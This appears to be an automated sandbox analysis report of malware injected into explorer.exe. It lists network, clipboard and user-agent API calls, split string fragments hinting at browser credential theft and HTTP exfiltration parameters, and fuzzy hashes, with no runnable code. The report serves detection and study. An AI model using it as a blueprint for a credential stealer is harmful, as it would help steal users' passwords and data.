Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a89a79afbcb313f536cfbe3193164b7db88fda6adf297130c30c4a6836223b7d
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3452, Parent PID: 5184COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	186
Total number of Limit Nodes:	19

Executed Functions

Function 06AC54D2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 06AC568B
SleepEx.KERNEL32 ref: 06AC5D1F
setsockopt.WS2_32 ref: 06AC5DD5
recv.WS2_32 ref: 06AC5E01
recv.WS2_32 ref: 06AC5E42

Strings

ose, xrefs: 06AC58EA
nnec, xrefs: 06AC58D5
: cl, xrefs: 06AC58E3
tion, xrefs: 06AC58DC
&un=, xrefs: 06AC5A3C
&br=, xrefs: 06AC5A53
dat=, xrefs: 06AC5855
Co, xrefs: 06AC58CE
GET , xrefs: 06AC58C3
&wn=, xrefs: 06AC59DD

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: recv$Sleepgetaddrinfosetsockopt
String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
API String ID: 878647675-2045366144
Opcode ID: fbbe4af579508045bfdf9f0375650d3b09ac14e4a8249b24641ab081e571ffa6
Instruction ID: c0c1c09fb8d8c2b361e324a1125e53676ed0f9aa7b2307902d40f93f088ed790
Opcode Fuzzy Hash: fbbe4af579508045bfdf9f0375650d3b09ac14e4a8249b24641ab081e571ffa6
Instruction Fuzzy Hash: 12529570A18B088FCBA9FF28D994AEAB3E1FB98314F54452DD49BC7142DF30A546CB41

Uniqueness

Uniqueness Score: -1.00%

Function 06ABEE12 Relevance: 1.6, APIs: 1, Instructions: 63
clipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenClipboard.USER32 ref: 06ABEE69

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: b354c92da1b26441f918b25bc5ea55ae96f6054bb824048792e1b54959fd5ff1
Instruction ID: 2a7bfa3abf1a4722b44840c23020fe1e94d652e43d660d7a9a2fb55b6da7769a
Opcode Fuzzy Hash: b354c92da1b26441f918b25bc5ea55ae96f6054bb824048792e1b54959fd5ff1
Instruction Fuzzy Hash: 81113030510A19AFDB96BB7880CC7E93299FF48345F5814B8981ACE1D2DB76C982C721

Uniqueness

Uniqueness Score: -1.00%

Function 06AC0462 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,06AC0E8B), ref: 06AC0549

Strings

User, xrefs: 06AC04B0
urlm, xrefs: 06AC049B
on.d, xrefs: 06AC04A2
nt: , xrefs: 06AC04BE
-Age, xrefs: 06AC04B7

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: -Age$User$nt: $on.d$urlm
API String ID: 2681117516-1987325725
Opcode ID: dbb3df5cb4490005a39299126674f16d4e39cffdd84a6be0dad2eb2de57e5d39
Instruction ID: 04182a774bea1cfcae921915ba1beadbc5b2174fba7f7e592d432978f7a8cfc5
Opcode Fuzzy Hash: dbb3df5cb4490005a39299126674f16d4e39cffdd84a6be0dad2eb2de57e5d39
Instruction Fuzzy Hash: 4F31C231A18A4C8FCF85FFA8C9942EEB7E1FF58214F41422ED45ED7240DE7886058785

Uniqueness

Uniqueness Score: -1.00%

Function 06AC1F47 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 06AC1FBB

Strings

c<H, xrefs: 06AC1F4E
tart, xrefs: 06AC1F7A
WSAS, xrefs: 06AC1F73

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart$c<H
API String ID: 724789610-1403329224
Opcode ID: 2f0855824db776e8394248e35f06a4e88043eaaf839d930086a926078b1b5e11
Instruction ID: b10279aa904577c4724e688b6d8c288ae591a31fc23a182ce49cda6608ee67f0
Opcode Fuzzy Hash: 2f0855824db776e8394248e35f06a4e88043eaaf839d930086a926078b1b5e11
Instruction Fuzzy Hash: FC017130905A488FCB44EF19D0887A9F7E0FF58351F5541ADE909CF265C7B4D941C796

Uniqueness

Uniqueness Score: -1.00%

Function 06AC2062 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 06AC20CB

Strings

ect, xrefs: 06AC2091
conn, xrefs: 06AC208A

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 7400ba5f504970d90d53105be6edfb340a2181624505d9911f44b962137447ab
Instruction ID: 4c3fdc350de8ae656f571399643374009725698eb3062c3450309666c600a3ab
Opcode Fuzzy Hash: 7400ba5f504970d90d53105be6edfb340a2181624505d9911f44b962137447ab
Instruction Fuzzy Hash: 33012171518A4C8FCB84EF5CD489B6477E0FB59324F1941BEA90DCB266C6B4CD818B81

Uniqueness

Uniqueness Score: -1.00%

Function 06AC1F52 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 06AC1FBB

Strings

tart, xrefs: 06AC1F7A
WSAS, xrefs: 06AC1F73

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: d5e0a14414909ac217073d11bc0fdf0045704fd2fa95e878a7bc74a829dcdb5b
Instruction ID: 2ead4f09a7f66d90568823dbb22bc8d14f779ed5e84aa4c6782fa23956afc002
Opcode Fuzzy Hash: d5e0a14414909ac217073d11bc0fdf0045704fd2fa95e878a7bc74a829dcdb5b
Instruction Fuzzy Hash: D2014F30919A488FCB84EF18D0887A9F7E1FF58351F5541A9E80DCF265C7B4D941C796

Uniqueness

Uniqueness Score: -1.00%

Function 06AC1FD2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 06AC203D

Strings

send, xrefs: 06AC1FFA

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: d7e7863cc5b815ef35b6348ff468fb37c4f76fb97e464e1aa62c1a94cc4693b6
Instruction ID: 2fb6b81c9c83fd55eb38b7678ca2776df7ccab2df443ef2f60852322f0926e2c
Opcode Fuzzy Hash: d7e7863cc5b815ef35b6348ff468fb37c4f76fb97e464e1aa62c1a94cc4693b6
Instruction Fuzzy Hash: 9401523051CA4C8FDB84EF1CD088B5577E0FB68324F1941AE984DCB266C6B4D981CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06AC1EC2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 06AC1F2B

Strings

sock, xrefs: 06AC1EE9

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 780e479dfe18adb229fbe30cb7fbc139d70c25898bf7b42724f5e6c50fc685f9
Instruction ID: 6d0d6a104260bc8c6e678165af91245218fcf97602c9c08eb8906b4c8cb93dcb
Opcode Fuzzy Hash: 780e479dfe18adb229fbe30cb7fbc139d70c25898bf7b42724f5e6c50fc685f9
Instruction Fuzzy Hash: CF017130518A488FCB84EF1CD048B54BBE5FB58354F1541BEE84DCB266C7B4C9418B85

Uniqueness

Uniqueness Score: -1.00%

Function 06AC448B Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 06AC4547

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 381d8c601cab91970851391f1b0531dbb5c05a83c5e728313e61967640c51096
Instruction ID: dbe7ecca5a5a6847effb2739e067b644a2ec6e275970f087f923f9a8c490e399
Opcode Fuzzy Hash: 381d8c601cab91970851391f1b0531dbb5c05a83c5e728313e61967640c51096
Instruction Fuzzy Hash: D5313C7151CB4C8FCB69EF18D9865E973E0F795720F40062ED58A8B115DA30AD43C7DA

Uniqueness

Uniqueness Score: -1.00%

Function 06AC4492 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 06AC4547

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: bfc56303194ed9e25926b02d47727908e81122bef77664ea965d9b93c42bcd15
Instruction ID: 6eb8e245e701dc55522f2be1b876d50560b0587ed3c40fca76af8a31f4b3d50c
Opcode Fuzzy Hash: bfc56303194ed9e25926b02d47727908e81122bef77664ea965d9b93c42bcd15
Instruction Fuzzy Hash: 6D314C7151CB4CCFCB69EF08D9865A9B3E0F798320F40021ED98A8B115DA30AD42CBCA

Uniqueness

Uniqueness Score: -1.00%

Function 06ABD592 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 06ABD5E7

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 51a3144160879aebb1c3bca2f28ca481d7c4799fbae7fccdb7004399c0c4e6dd
Instruction ID: 8e6fc928949f0b1e5d278155ee02ad1913453c6261e2a73ae3c2a1b7255d55ab
Opcode Fuzzy Hash: 51a3144160879aebb1c3bca2f28ca481d7c4799fbae7fccdb7004399c0c4e6dd
Instruction Fuzzy Hash: C6215E34A18B4C8FCBD4FF2884E46EAB7A5FF98214F49166E991ECB147CB709440CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06AC6352 Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 06AC63D1

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bdbd8f96bc63ab98b970ae82d5bc45150bfed02ed4eebafdae387104f658aa21
Instruction ID: a903a3cc52c92536480e2349063b84ef62681f45cfc58f3a805a5b8aed212966
Opcode Fuzzy Hash: bdbd8f96bc63ab98b970ae82d5bc45150bfed02ed4eebafdae387104f658aa21
Instruction Fuzzy Hash: BC11E920724F094B9BC9FB7D88A867AB3D2FBD8161B81563EA46BC7344DE24C8415342

Uniqueness

Uniqueness Score: -1.00%

Function 06ABD692 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 06ABD6E7

Memory Dump Source

Source File: 00000010.00000002.786956762.0000000006A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6a90000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5b9371bbed5dd9621206cf4a74862dd16b28805e44dbc8c00e601cec6d1debc0
Instruction ID: a715a75809da48e20c5a9e0dbcbf75048e437df5422cc26590c7d364cc654a13
Opcode Fuzzy Hash: 5b9371bbed5dd9621206cf4a74862dd16b28805e44dbc8c00e601cec6d1debc0
Instruction Fuzzy Hash: A8F0A430628A084FDBC8FF2CD8916AAB3E4FF9C310F454A3EA54EC7255DA35C5418746

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0599C282 Relevance: 10.4, Strings: 8, Instructions: 406COMMON

Download Yara Rule

Strings

ll, xrefs: 0599C481
user, xrefs: 0599C471
kern, xrefs: 0599C4B0
el32, xrefs: 0599C495
S, xrefs: 0599C5B7
32.d, xrefs: 0599C479
.dll, xrefs: 0599C49D
M, xrefs: 0599C5C6

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$el32$kern$ll$user
API String ID: 0-2502794028
Opcode ID: ef55e459ba0f221cd969f9545d4a8b4f591c582130f4376670b9f70d4407ccab
Instruction ID: ac367330a8cbce20373db60a354bf97e0347da190a87ef36b2fd870e39d23117
Opcode Fuzzy Hash: ef55e459ba0f221cd969f9545d4a8b4f591c582130f4376670b9f70d4407ccab
Instruction Fuzzy Hash: FDE15974718A499FCB49EF78C498BAAF3E1FB98300F90462E915EC7240EF34A551CB85

Uniqueness

Uniqueness Score: -1.00%

Function 059A0974 Relevance: 56.5, Strings: 45, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@@@@, xrefs: 059A0A9C
@@@@, xrefs: 059A0ABF
@@@@, xrefs: 059A0B05
@@@@, xrefs: 059A0A09
@@@@, xrefs: 059A0B1A
@@@@, xrefs: 059A0ACD
@@@@, xrefs: 059A0B13
@@@@, xrefs: 059A0B36
89:;, xrefs: 059A09FB
%&'(, xrefs: 059A0A5D
@@@@, xrefs: 059A0A95
@@@@, xrefs: 059A0B2F
4567, xrefs: 059A09F4
@@@@, xrefs: 059A0B44
@@@@, xrefs: 059A0A8E
-./0, xrefs: 059A0A6B
@@@@, xrefs: 059A0AD4
@@@@, xrefs: 059A0B59
@@@@, xrefs: 059A0B52
!"#$, xrefs: 059A0A56
@@@@, xrefs: 059A0AF0
@@@@, xrefs: 059A0AB1
@@@@, xrefs: 059A0AAA
@@@@, xrefs: 059A0A87
@@@@, xrefs: 059A0B0C
@@@@, xrefs: 059A0B3D
123@, xrefs: 059A0A72
@@@@, xrefs: 059A0B4B
<=@@, xrefs: 059A0A02
)*+,, xrefs: 059A0A64
@@@@, xrefs: 059A0AC6
@@@@, xrefs: 059A0B21
@@@@, xrefs: 059A0A80
@@@?, xrefs: 059A09ED
@@@@, xrefs: 059A0A41
@@@@, xrefs: 059A0AE9
@@@@, xrefs: 059A0B28
@@@@, xrefs: 059A0AFE
@@@@, xrefs: 059A0AB8
@@@@, xrefs: 059A0A79
@@@@, xrefs: 059A0AA3
@@@@, xrefs: 059A0ADB
?, xrefs: 059A0B6A
@@@@, xrefs: 059A0AE2
@@@@, xrefs: 059A0AF7

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: c4dac72695097af203d851d82d40ef55b635c0ff1298fb0584560c3feecc23f2
Instruction ID: 2732591cf0670829e4ae6538b4183b5e57f68901e95b742b046415c78be97693
Opcode Fuzzy Hash: c4dac72695097af203d851d82d40ef55b635c0ff1298fb0584560c3feecc23f2
Instruction Fuzzy Hash: B6916FF04083948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B95

Uniqueness

Uniqueness Score: -1.00%

Function 059A0982 Relevance: 56.5, Strings: 45, Instructions: 209COMMON

Download Yara Rule

Strings

@@@@, xrefs: 059A0A9C
@@@@, xrefs: 059A0ABF
@@@@, xrefs: 059A0B05
@@@@, xrefs: 059A0A09
@@@@, xrefs: 059A0B1A
@@@@, xrefs: 059A0ACD
@@@@, xrefs: 059A0B13
@@@@, xrefs: 059A0B36
89:;, xrefs: 059A09FB
%&'(, xrefs: 059A0A5D
@@@@, xrefs: 059A0A95
@@@@, xrefs: 059A0B2F
4567, xrefs: 059A09F4
@@@@, xrefs: 059A0B44
@@@@, xrefs: 059A0A8E
-./0, xrefs: 059A0A6B
@@@@, xrefs: 059A0AD4
@@@@, xrefs: 059A0B59
@@@@, xrefs: 059A0B52
!"#$, xrefs: 059A0A56
@@@@, xrefs: 059A0AF0
@@@@, xrefs: 059A0AB1
@@@@, xrefs: 059A0AAA
@@@@, xrefs: 059A0A87
@@@@, xrefs: 059A0B0C
@@@@, xrefs: 059A0B3D
123@, xrefs: 059A0A72
@@@@, xrefs: 059A0B4B
<=@@, xrefs: 059A0A02
)*+,, xrefs: 059A0A64
@@@@, xrefs: 059A0AC6
@@@@, xrefs: 059A0B21
@@@@, xrefs: 059A0A80
@@@?, xrefs: 059A09ED
@@@@, xrefs: 059A0A41
@@@@, xrefs: 059A0AE9
@@@@, xrefs: 059A0B28
@@@@, xrefs: 059A0AFE
@@@@, xrefs: 059A0AB8
@@@@, xrefs: 059A0A79
@@@@, xrefs: 059A0AA3
@@@@, xrefs: 059A0ADB
?, xrefs: 059A0B6A
@@@@, xrefs: 059A0AE2
@@@@, xrefs: 059A0AF7

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction ID: 36d89025b6278f0c36caf211426a41b56b1b10c086a03371e8a85272e6ce6ee8
Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction Fuzzy Hash: 2B916FF04082988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B95

Uniqueness

Uniqueness Score: -1.00%

Function 0599CA72 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 0599CABD
t, xrefs: 0599CB18
d, xrefs: 0599CAF5
i, xrefs: 0599CAEE
n, xrefs: 0599CB0A
u, xrefs: 0599CAB1
l, xrefs: 0599CB26
n, xrefs: 0599CB11
d, xrefs: 0599CACB
s, xrefs: 0599CAD9
l, xrefs: 0599CAD2
d, xrefs: 0599CB1F
w, xrefs: 0599CB03
p, xrefs: 0599CAE0
c, xrefs: 0599CAE7
2, xrefs: 0599CAC4
l, xrefs: 0599CAFC

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
Instruction ID: 6fe74c4b5bacef6a539a88cc5fea3e37887b3ac6468b744eb68f4f0d9c58acac
Opcode Fuzzy Hash: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
Instruction Fuzzy Hash: 95416E70A1CB088BDF18DF8CA8496BD7BE6FB88704F00015ED449D7241DBB5AD458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0599DE62 Relevance: 9.0, Strings: 7, Instructions: 292COMMON

Download Yara Rule

Strings

User, xrefs: 0599DF2B
word, xrefs: 0599DF1E
UR, xrefs: 0599DEDF
L: , xrefs: 0599DEE6
name, xrefs: 0599DF32
Pass, xrefs: 0599DF17
2, xrefs: 0599DF61

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: ecd7a9df6ed45f633457797a3e2df4e30bda1e7f09a1351f0d4494de5fb75da8
Instruction ID: 8f624dd544680566932adfa8f0b524e439100aac27cf322d91d5c057eb9caaa6
Opcode Fuzzy Hash: ecd7a9df6ed45f633457797a3e2df4e30bda1e7f09a1351f0d4494de5fb75da8
Instruction Fuzzy Hash: 09919E71B187488BDB29EF68D4487EEB7E6FB88300F40462EE48ED7241EF7495458785

Uniqueness

Uniqueness Score: -1.00%

Function 0599CBF2 Relevance: 7.7, Strings: 6, Instructions: 164COMMON

Download Yara Rule

Strings

o, xrefs: 0599CD1C
n, xrefs: 0599CD23
U, xrefs: 0599CD0E
k, xrefs: 0599CD15
b, xrefs: 0599CCA8
d, xrefs: 0599CCB8

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: U$b$d$k$n$o
API String ID: 0-1739295752
Opcode ID: f395da3f14147628146306b5dfc08889b38b3737afe6d3ab010db18635c0ab7e
Instruction ID: 049c7729856620163b7a2487130599c9f161128af76e2db660106ea1e8d252fd
Opcode Fuzzy Hash: f395da3f14147628146306b5dfc08889b38b3737afe6d3ab010db18635c0ab7e
Instruction Fuzzy Hash: DA517E31724A099BCF09EFA8D8447EEB7A1FF94301F004629D51ED7241EF74AA648BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0599E1C2 Relevance: 6.5, Strings: 5, Instructions: 209COMMON

Download Yara Rule

Strings

nss3, xrefs: 0599E2B8
dll, xrefs: 0599E37A
cryp, xrefs: 0599E36C
t32., xrefs: 0599E373
.dll, xrefs: 0599E2BF

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: .dll$cryp$dll$nss3$t32.
API String ID: 0-1478216402
Opcode ID: 4ab26943552f321f241616bfcd63a8d5f4226be12f7ce5a5b0241a6913008ec3
Instruction ID: 311b4741ba73390cf6475e6b164983582e241f0f2336301458ed0d7d77dce74e
Opcode Fuzzy Hash: 4ab26943552f321f241616bfcd63a8d5f4226be12f7ce5a5b0241a6913008ec3
Instruction Fuzzy Hash: CB714C70618B099FDF59EF68C0483EAB3E5FF58300F40562A980AC7294EB78E954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0599B7E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

ole3, xrefs: 0599B80D
shel, xrefs: 0599B840
dll, xrefs: 0599B84E
2.dl, xrefs: 0599B814
l32., xrefs: 0599B847

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: 1f18f0cfe7bdd05db78731f4133f91a5297aee686e1d6ec86f3d9519d513fc63
Instruction ID: 72213e5e60bde7f82af62e6138c7d1163dc1c0df1912ef88c186f09b94b8faa7
Opcode Fuzzy Hash: 1f18f0cfe7bdd05db78731f4133f91a5297aee686e1d6ec86f3d9519d513fc63
Instruction Fuzzy Hash: 66616D71A18B4C8BCF19EFA8D0446DEB7F1FF58300F404A2E949AD7254EF30A5519B85

Uniqueness

Uniqueness Score: -1.00%

Function 0599E462 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

nt: , xrefs: 0599E4BE
urlm, xrefs: 0599E49B
on.d, xrefs: 0599E4A2
-Age, xrefs: 0599E4B7
User, xrefs: 0599E4B0

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: -Age$User$nt: $on.d$urlm
API String ID: 0-1987325725
Opcode ID: dbb3df5cb4490005a39299126674f16d4e39cffdd84a6be0dad2eb2de57e5d39
Instruction ID: 3074e2389e6c5bef203cc74ab68f44f5c603f608aba1707068514ee879e71059
Opcode Fuzzy Hash: dbb3df5cb4490005a39299126674f16d4e39cffdd84a6be0dad2eb2de57e5d39
Instruction Fuzzy Hash: C631C231714A4C8FCF45EFA8C8886EDB7E5FB98204F40422AD54ED7240EF789A458795

Uniqueness

Uniqueness Score: -1.00%

Function 0599C002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON

Download Yara Rule

Strings

el32, xrefs: 0599C117
.dll, xrefs: 0599C11F
kern, xrefs: 0599C10F
h, xrefs: 0599C104

Memory Dump Source

Source File: 00000010.00000002.785334889.0000000005970000.00000040.00000001.00040000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5970000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 8af6525b1371c8f7a032866cbb0f27086e4dca1bf0e611e0d2fbec67b1fc2cff
Instruction ID: f93b9131c5a1b515f896b3aaf66ea5cbffa545e4a0a18fa7a8e76f0b6ecafe28
Opcode Fuzzy Hash: 8af6525b1371c8f7a032866cbb0f27086e4dca1bf0e611e0d2fbec67b1fc2cff
Instruction Fuzzy Hash: 3041A47060CB488FDFA8DF2C94883AAB7E1FBA8301F144A2F949AC3255DB70D545CB85

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exePID: 5764, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
